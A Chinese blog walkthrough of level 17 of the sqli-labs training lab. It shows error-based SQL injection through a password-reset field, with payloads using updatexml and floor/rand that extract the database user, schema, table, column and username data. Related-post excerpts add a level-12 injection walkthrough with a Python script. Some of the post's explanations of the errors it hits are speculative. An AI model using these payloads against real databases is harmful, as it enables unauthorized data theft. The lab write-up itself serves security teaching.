sqli-labs 第十七关

最新推荐文章于 2025-05-21 11:34:36 发布
最新推荐文章于 2025-05-21 11:34:36 发布
阅读量1.1k 收藏 15
点赞数 15
CC 4.0 BY-SA版权
文章标签: mybatis spring java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64302290/article/details/138815976

目录

找注入点:

源码分析:

测试:

奇怪现象:

        (1):当我们输入的密码为字符进行注入时。

        (2):当我们输入的密码为整数时。

产生原因:

解决方法:

开始注入:

            注入用户名:

           注入数据库名:

            注入表名:

             注入列名:

               注入具体值:

找注入点:

       

        经过我们的测试,当在密码出输入一个单引号时就会出现报错,对此注入点可能就在该位置。

       

源码分析:

       可以发现,这里使用update语句来修改用户的密码,并且对我们输入的用户名进行了过滤但并没有对密码进行过滤。并且允许sql语句报错,由此我们可以使用报错注入。

       

        

测试:

        在上面已经确认使用报错注入来完成,我们先测试看看能不能注入出数据。

奇怪现象:

        接下来我们一步一步注入。

        (1):当我们输入的密码为字符进行注入时。

        一:注入用户名

                admin' and updatexml(1,concat(0x7e,(user(),0x7e),1)#

        二:注入数据库名

                admin' and updatexml(1,concat(0x7e,(database()),0x7e),1) #

        三:注入表名

                admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

               这里,我们发现我们输入这句sql报了上面这个错误,但是我们的sql注入语句并没有写错。这就是我们的奇怪现象之一。

        (2):当我们输入的密码为整数时。

                我们接着上面测试注入表名。

                2' and updatexml(1,concat(0x7e,(select group_concat(table_name) from                 information_schema.tables where table_schema='security'),0x7e),1)#

        这里我们发现当我们的密码为整数时就可以注入出数据。这就是第二个奇怪现象。

产生原因:

        经过我在各种论坛上去查找,终于找到了原因。

        (1):在Update语句中从左到右执行,当前面输入的密码为字符时并且到and时语法就会出现错误。之所以前面的用户名和数据库名会被爆出来,是因为user()和database()是mysql内置的函数,优先级较高,优先执行,所以会被爆出来。如下:

 admin' and updatexml(1,concat(0x7e,(user(),0x7e),1)#
admin' and updatexml(1,concat(0x7e,(database()),0x7e),1) #

        (2)当前面的输入的密码 为整数时,之所以可以被执行,是因为当我们输入的为整数时相当与给后面的语句加上了一个括号,并且有限执行括号中的内容。所以能够爆出数据。

2' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#

解决方法:

        我们可以使用在前面输入的密码为整数的方式进行注入。也可以使用floor报错函数进行注入。

开始注入:

        我们使用前面密码为整数的方式来进行注入。

            注入用户名:

           2' and updatexml(1,concat(0x7e,(user()),0x7e),1)#

           注入数据库名:

                2' and updatexml(1,concat(0x7e,(database()),0x7e),1)#

            注入表名:

2' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#      

                       

             注入列名:

2' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)# 

        

               注入具体值:

23' and(select 1 from (select count(*),concat(substring((select group_concat(username) from users),1,32),floor(rand(0)*2))x from information_schema.tables group by x)a)#

    

到此我们实验就完美注入了。

小插曲:

大家可以看到在最后注入具体值的时候我们使用的是floor进行注入,是因为当我们使用updatexml进行注入时会爆下面的问题: 等我查阅资料后回来改正。

2' and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)#

总结:这里推荐大家使用floor进行报错注入,使用floor报错注入就不会出现任何问题。

sqlilabs第17
wh1sper、的博客
04-29 1401
sqlilabs第17一、分析二、手注 一、分析 这题目叫做基于报错的更新查新。 遇事不决,就直接看源码。 通过源码我们得知当我们输入数据进去时,会先查询users表与我们输入进去的用户名对比。 如果没有这个用户,就会告诉你。(这肯定忍不了) 相反他会检查用户名。 在check_input中,我贴了函数的链接,师傅们比我总结的详细。 get_magic_quotes_gpc()函数 ctype_digit()函数 二、手注 ...
Sqli-labs靶场第17详解[Sqli-labs-less-17]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 988
根据题目及测试发现,注入点在New Password上并且后台会判断user是否存在,所以user选择一个知道的name:admin或domo。如果当前会话用户对包含 DBMS 可用数据库信息的系统表有读取权限,则可以枚举出当前数据库列表。,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。单引号 '闭合 -- 报错注入。爆出DBMS 所有数据库。
SQLI-labs-第十七
weixin_54055099的博客
05-16 1419
Sqli-labs第十七,二次注入、报错注入
sqli-labs第十七——POST注入点
最新发布
2403_88102829的博客
05-21 235
测试四个代码,页面均无反应所以我们更换注入点的位置 ,再密码框注入第二行成功得到不同的回显,得出结论:注入点在密码栏, 是单引号字符型闭合成功。
sqli-labs第十七详解
金 帛的博客
04-26 4976
sqlilabs第十七详解
sqli-labs第十七
m0_73248913的博客
02-11 411
sqli-labs第十七教程
Sqlilabs-17
KAKA的博客
07-07 945
来到了 17 ,从这开始刚学习需要借助源码来配合学习,本学习内容是 update 内容 从源码中可以看到,开发者的意图流程是: 首先查询用户名相匹配的 users 表中 数据,所以这里如果需要注入首先得有一个在数据库中已经有了的用户名,若是现实挖掘漏洞过程中这,如果可以,可以先自己先注册一个,这下在数据库中就躺着了一个可利用的用户名和密码…,没有的话可以盲猜,如一般都有 admin guest等等可以直接利用的… 继续往下看源码,你会发现 username 身上加了个check_input,转到
sqli-labssqli-labs 靶场通(1-16)
m0_71944965的博客
09-02 712
🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】sqli-labs 靶场通(1-16)sqli-labs第一 sqli-labs第一 输入?id=1 正常 输入?id=1' 报错 输入?id=1'--+ 正常 判断有注入点且闭合方式是 ’ 使用and ‘1’='1判断他为字符型注入 ?id=1' order by 3--+ 正常 ?id=1' order by 4--+ 报错 判断回显位有三个。 id=0
用sqlmap工具打sqli-labs前20靶场
longnice666的博客
11-17 3361
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL和SQL注入漏洞。
SQLi-labs-Master(1-22)新手通宝典
Myosotis_LL的博客
05-18 3169
欢迎来到《SQLi-labs-Master新手通宝典》,本宝典专为网络安全新手编写,旨在引导他们深入了解SQL注入(SQLi)这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询,从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发,逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境,你将有机会在真实场景中实践SQL注入攻击,并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者,掌握SQL注入技术都将对你大有裨益。
sqli-labs注入——sqli-labs的1-65指南
qq_51366383的博客
01-27 1984
sqli-labs图片上一共有75,但是下载的资料都只有65,所以只写了65,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs(十七)
qq_65950075的博客
05-05 799
这一跟前面的卡都不一样,是全新的卡,页面是一个密码重置页面,需要输入用户名,然后输入新的密码,就会把我们的旧密码替换掉。所以就会用到数据库的update更新数据,不再是前面的查询数据,所以之前的联合注入和布尔盲注以及时间盲注都不能用了。这里我们要用到之前使用过的报错注入。所以我们使用mid()函数来截取,因为是从32位开始不能看到,所以我们从第32位开始截取,截取后32位。这里要先输入正确的用户名,验证成功后才会把新密码替换,所以我们输入。但是回显并没有完全,因为报错回显只能回显32位。
sqli-labs 17
m0_69548793的博客
08-27 1414
sqli-labs 17
SQL-labs的第17——报错注入(updatexml)
qq_73393033的博客
07-20 623
这一的网站是用来修改密码的,所以数据库会执行update这种查询方式,而不是select这种查询方式。我们发现用户名这一框输入数据不行,会进行过滤。所以我们这次在密码这一框中进行注入。
sqli-labs-----17
wyzhxhn的博客
11-10 934
基于报错的更新查新。
sqli-labs17(基于post提交的单引号闭合的报错盲注)通思路
zyh1588的博客
11-11 774
小白回顾sql靶场17
sql-labs靶场第十七测试报告
ccc_9wy的博客
10-18 1888
sql-labs第十七的测试报告;手工注入和sqlmap两种方法;靶场源代码分析;详细过程;报错注入。
Sqli-labs第十七之UpdateXML
qq_39511050的博客
08-28 813
updatexml函数,xpath表达式
sqli-labs-master第17
m_ing
05-14 3101
前言:这一变化还是挺大的,让我们修改密码。 第17 http://192.168.89.134/sqli-labs-master/Less-17/ 到这里我们还是毫无头绪,只能看源代码 从源码中可以看到:接收到用户POST的uname和passwd后,首先根据uname查询数据库的username和password,若uname存在则用passwd替换password,若不存在则显示slap1.jpg 在用户名正确后,页面便能够返回Mysql错误信息 所以我们决定用报错注入 使用updatexml(
sqli-labs第十二怎么过
05-01
<think>嗯,用户现在在问SQLi-Labs第十二的解法或提示。首先,我需要回忆一下第十二的特点。根据之前的经验,SQLi-Labs的每个卡通常涉及不同类型的SQL注入,比如GET或POST请求,不同的参数处理方式,或者特定的过滤和防护措施。用户之前可能已经完成了前面的卡,所以第十二可能比之前的更难,或者引入了新的挑战。 根据用户提供的引用内容,之前的卡如第四、第七涉及到联合查询注入和文件导出操作,比如使用`union select`结合`group_concat`获取表名,或者`into outfile`导出数据。第七还提到了文件操作的函数需要配置`secure_file_priv`。这些引用可能提示第十二可能涉及类似的注入技术,但可能有不同的参数处理方式,比如POST请求或不同的注入点类型。 首先,我需要确认第十二的具体设置。通常,第十二可能是一个POST类型的注入,比如基于报错的注入或者盲注。例如,可能是一个登录表单,用户需要利用注入绕过认证或提取数据。根据用户提供的引用,第七使用了文件导出,而第四是联合查询,但第十二可能有所不同。 然后,用户提供的引用中有于爆库名、表名的技术,如使用`extractvalue`函数进行报错注入,这可能在第十二中适用。比如,如果注入点存在报错回显,可以利用报错注入来获取信息。此外,联合查询注入需要确定列数,可能需要通过`order by`来测试。 另外,引用中提到了`into outfile`的使用,但第十二可能涉及到字符转义或闭合问题。例如,输入参数可能被包裹在特定的符号中,如双引号和括号,导致需要正确闭合才能执行注入。例如,如果参数处理是`"$id"`,那么注入时需要闭合双引号,并处理可能的括号。 接下来,考虑用户可能需要具体的步骤。比如,确定注入点类型(字符型还是数字型)、测试闭合方式、使用联合查询或报错注入。例如,如果输入被包裹在双引号和括号中,如`("$id")`,那么注入可能需要类似`")`来闭合,然后添加恶意代码。 同时,用户可能遇到的障碍包括如何正确闭合引号和括号,如何绕过过滤,或者如何确定可用的列数。例如,使用`") order by 3--+`来测试列数,然后进行联合查询,或者使用报错函数如`updatexml`或`extractvalue`来提取数据。 另外,需要注意是否有过滤函数,比如对`union select`或空格的处理,可能需要使用注释符或内联注释绕过。例如,使用`/**/`代替空格,或者使用`%a0`作为空格的替代。 根据引用[3]中的例子,报错注入使用了`extractvalue`函数,这可能适用于第十二。例如,构造如`" or extractvalue(1, concat(0x7e, (select database()))) --+`这样的注入语句,触发数据库错误并返回信息。 最后,用户可能需要导出文件,但需要确认`secure_file_priv`的设置是否允许写入,如引用[4]所述。但在第十二中,可能不需要文件导出,而是侧重于通过注入获取数据。 总结可能的步骤:1. 确定注入点类型和闭合方式;2. 测试列数;3. 使用联合查询或报错注入获取信息;4. 提取数据库名、表名、列名和数据。</think>根据SQLi-Labs第十二的POST型注入特点和常见解法,以下是分步解析: ### 第十二解题思路 #### 1. 确定注入类型 本为**POST请求**,参数使用双引号+括号包裹:`("$id")`。测试闭合方式时需使用`")`闭合原始语句[^4]。 #### 2. 构造闭合语句 尝试在用户名或密码输入框中注入: ```sql admin") or 1=1 --+ ``` 若成功绕过登录,说明闭合正确。 #### 3. 联合查询注入 **(1) 确定列数** ```sql admin") order by 3 --+ ``` 当`order by 4`报错时,说明共3列。 **(2) 获取回显位** ```sql admin") union select 1,2,3 --+ ``` 观察页面显示数字2和3的位置用于回显。 **(3) 提取数据库信息** ```sql admin") union select 1,database(),version() --+ ``` 回显当前数据库名和版本[^1]。 #### 4. 报错注入(备用方案) 若联合查询被过滤,使用`updatexml()`: ```sql admin") and updatexml(1,concat(0x7e,(select user())),1) --+ ``` 通过报错信息获取当前用户[^3]。 ```python # 示例请求代码(Python requests) import requests url = "http://localhost/sqli-labs/Less-12/" data = {"uname": 'admin") union select 1,@@version,3 --+', "passwd": "test"} response = requests.post(url, data=data) print(response.text) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值